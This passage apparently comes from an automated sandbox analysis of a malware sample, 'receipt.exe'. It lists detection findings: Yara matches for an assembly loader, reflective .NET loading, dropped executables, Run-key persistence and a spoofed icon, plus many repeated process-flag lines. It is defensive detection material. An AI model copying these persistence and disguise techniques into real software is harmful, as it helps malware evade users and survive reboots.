Source: receipt.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected Costura Assembly Loader
Source: Yara match File source: 14.2.Uewizrlgm.exe.2c6dd3c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.receipt.exe.5630000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.receipt.exe.4133bd0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.receipt.exe.3fb3b90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.receipt.exe.4206fb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.receipt.exe.5630000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.5490000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.receipt.exe.3f73b70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.receipt.exe.4306fd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.receipt.exe.4133bd0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3074e04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.receipt.exe.30df6fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.receipt.exe.3f53b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Uewizrlgm.exe.2acc71c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.receipt.exe.4306fd0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.354725575.0000000004133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356142164.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.598901171.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575412932.00000000054AB000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.338895273.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.352308180.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: receipt.exe PID: 4184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Uewizrlgm.exe PID: 5880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Uewizrlgm.exe PID: 5988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Uewizrlgm.exe PID: 5140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Uewizrlgm.exe PID: 1800, type: MEMORYSTR
.NET source code contains potential unpacker
Source: receipt.exe, u0005.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Uewizrlgm.exe.0.dr, u0005.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.receipt.exe.bf0000.0.unpack, u0005.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Cfrstztdf.exe.12.dr, u0005.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.receipt.exe.400000.0.unpack, u0005.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\receipt.exe Code function: 0_2_01683B33 push esp; retn 0133h 0_2_01683B3D
Source: C:\Users\user\Desktop\receipt.exe Code function: 12_2_014B3B12 push esp; retn 0146h 12_2_014B3B3D
Source: initial sample Static PE information: section name: .text entropy: 7.95312510004089
Source: initial sample Static PE information: section name: .text entropy: 7.95312510004089
Source: initial sample Static PE information: section name: .text entropy: 7.95312510004089
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Drops PE files
Source: C:\Users\user\Desktop\receipt.exe File created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\receipt.exe File created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe File created: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe Jump to dropped file
Source: C:\Users\user\Desktop\receipt.exe File created: C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\receipt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Cfrstztdf Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Uewizrlgm Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Uewizrlgm Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Uewizrlgm Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Cfrstztdf Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Cfrstztdf Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (102).png
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
